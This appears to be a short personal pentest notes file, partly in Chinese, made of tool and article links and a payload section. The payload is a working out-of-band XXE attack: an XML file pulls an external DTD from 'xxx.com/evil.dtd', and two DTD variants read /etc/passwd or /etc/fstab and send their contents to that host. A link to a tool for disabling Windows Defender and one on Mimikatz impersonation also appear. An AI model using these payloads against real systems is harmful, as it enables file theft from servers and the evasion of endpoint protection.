https://www.dsinternals.com/en/impersonating-office-365-users-mimikatz/
https://github.com/NYAN-x-CAT/Disable-Windows-Defender
payload
main.xml
<?xml version="1.0"?>
<!DOCTYPE data SYSTEM "http://xxx.com/evil.dtd">
<data>&send;</data>evil.dtd
无XML标记:
<!ENTITY % passwd SYSTEM "file:///etc/passwd">
<!ENTITY % wrapper "<!ENTITY send SYSTEM 'http://xxx.com/?%passwd;'>">
%wrapper;
有xml标记:
<!ENTITY % file SYSTEM "file:///etc/fstab">
<!ENTITY % start "<![CDATA[">
<!ENTITY % end "]]>">
<!ENTITY % wrapper0 "<!ENTITY all '%start;%file;%end;'>">
%wrapper0;
<!ENTITY % wrapper "<!ENTITY send SYSTEM 'http://xxx.com/?%all;'>">
%wrapper;
https://malware-traffic-analysis.net
https://github.com/secureworks/dalton
科来数据包播放器